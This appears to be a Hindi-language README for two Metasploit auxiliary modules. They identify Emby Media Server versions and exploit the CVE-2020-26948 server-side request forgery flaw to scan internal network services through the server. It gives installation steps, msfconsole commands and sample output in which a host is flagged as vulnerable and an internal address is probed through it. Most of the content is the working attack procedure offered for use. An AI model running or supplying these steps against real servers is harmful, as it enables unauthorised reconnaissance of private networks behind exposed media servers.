
Metasploit सहायक मॉड्यूल जो Emby Media Server संस्करण की पहचान करता है और आंतरिक नेटवर्क सेवाओं को स्कैन करने के लिए CVE-2020-26948 SSRF भेद्यता का शोषण करता है।
यह उपकरण एक दूरस्थ EMBY सर्वर की जाँच करेगा ताकि SSRF भेद्यता का उपयोग करके EMBY सर्वर के आंतरिक नेटवर्क का http स्कैन किया जा सके। यह CVE-2020-26948 भेद्यता पर आधारित है।
रिपॉजिटरी को क्लोन करें और rb फ़ाइलों को /usr/share/metasploit-framework/modules/auxiliary/scanner/http/ निर्देशिका में रखें। msfconsole चलाएँ, और वहाँ से मॉड्यूल का उपयोग करें।
use auxiliary/scanner/http/emby_version_ssrfset rhosts [ips]runmsf6 > use auxiliary/scanner/http/emby_version_ssrf
msf6 auxiliary(scanner/http/emby_version_ssrf) > set rhosts 10.10.200.32
rhosts => 10.10.200.32
msf6 auxiliary(scanner/http/emby_version_ssrf) > run
[*] Identifying Media Server Version on 10.10.200.32:8096
[+] [Media Server] URI: http://10.10.200.32:8096 /
[+] [Media Server] Version: 4.4.2.0
[+] [Media Server] Internal IP: http://192.168.2.3:8096
[+] *** Vulnerable to SSRF module auxiliary/scanner/emby_ssrf_scanner! ***
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
use auxiliary/scanner/http/emby_ssrf_scannerset rhosts [ips]set emby_server [emby_server_ip]runmsf6 > use auxiliary/scanner/http/emby_ssrf_scanner
msf6 auxiliary(scanner/http/emby_ssrf_scanner) > set emby_server 10.10.200.32
emby_server => 10.10.200.32
msf6 auxiliary(scanner/http/emby_ssrf_scanner) > set rhosts 192.168.2.3
rhosts => 192.168.2.3
msf6 auxiliary(scanner/http/emby_ssrf_scanner) > run
[+] 192.168.2.3:8096 Title: Emby
[+] 192.168.2.3:8096 HTTP Code: 200
[+] 192.168.2.3:8096 Location Header:
[+] 192.168.2.3:8096 Server Header: UPnP/1.0 DLNADOC/1.50
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed